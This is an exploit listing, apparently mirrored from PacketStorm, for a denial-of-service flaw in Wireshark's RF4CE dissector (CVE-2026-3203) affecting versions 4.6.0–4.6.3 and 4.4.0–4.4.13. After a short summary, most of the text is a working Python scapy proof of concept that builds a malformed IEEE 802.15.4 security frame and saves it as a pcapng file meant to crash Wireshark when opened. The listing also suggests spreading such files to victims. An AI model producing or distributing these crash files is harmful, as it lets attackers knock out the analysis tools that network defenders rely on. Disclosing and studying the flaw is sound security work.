Share
## https://sploitus.com/exploit?id=PACKETSTORM:216621
=============================================================================================================================================
    | # Title     : Wireshark 4.6.0โ€“4.6.3 4.4.0โ€“4.4.13 RF4CE Profile via Malformed IEEE 802.15.4 Dissector Crash โ€“ Denial of Service            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.wireshark.org/                                                                                                  |
    =============================================================================================================================================
    
    [+] Summary    :  A vulnerability in the RF4CE Profile protocol dissector of Wireshark versions 4.6.0โ€“4.6.3 and 4.4.0โ€“4.4.13 allows an attacker 
                      to trigger a Denial of Service (DoS) condition by supplying a specially crafted IEEE 802.15.4 packet capture file.
                      The flaw exists in the handling of malformed RF4CE security-enabled frames. By manipulating security-related fields 
    				  and providing inconsistent encrypted payload lengths, the dissector may attempt improper memory operations during 
    				  decryption processing (notably in CCM security handling routines). 
    				  This can lead to a segmentation fault and application crash when the malicious .
    				  pcapng file is opened in a vulnerable Wireshark version.
                      An attacker can exploit this vulnerability by distributing a malicious capture file, which, when analyzed, causes Wireshark to terminate unexpectedly.
    
    [+] POC   :  
    
    from scapy.all import *
    from scapy.layers.zigbee import *
    
    output_file = "rf4ce_crash_poc.pcapng"
    print(f"[+] Generating Malformed RF4CE Packet to trigger CVE-2026-3203...")
    dot154 = Dot154(fcf_frametype=1, fcf_security=1, fcf_panidcomp=1, seqnum=0x42)
    dot154_addressing = Dot154Data(dest_panid=0x1234, dest_addr=0x0001, src_addr=0x0002)
    rf4ce_nwk = Raw(load=b"\x0c\xff\xff\xff\xff") 
    malformed_security_payload = Raw(load=b"\x01" * 50) 
    pkt = dot154 / dot154_addressing / rf4ce_nwk / malformed_security_payload
    wrpcap(output_file, pkt)
    print(f"[+] File '{output_file}' has been created.")
    print(f"[!] Warning: Opening this file in Wireshark 4.6.0-4.6.3 will cause a CRASH.")
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================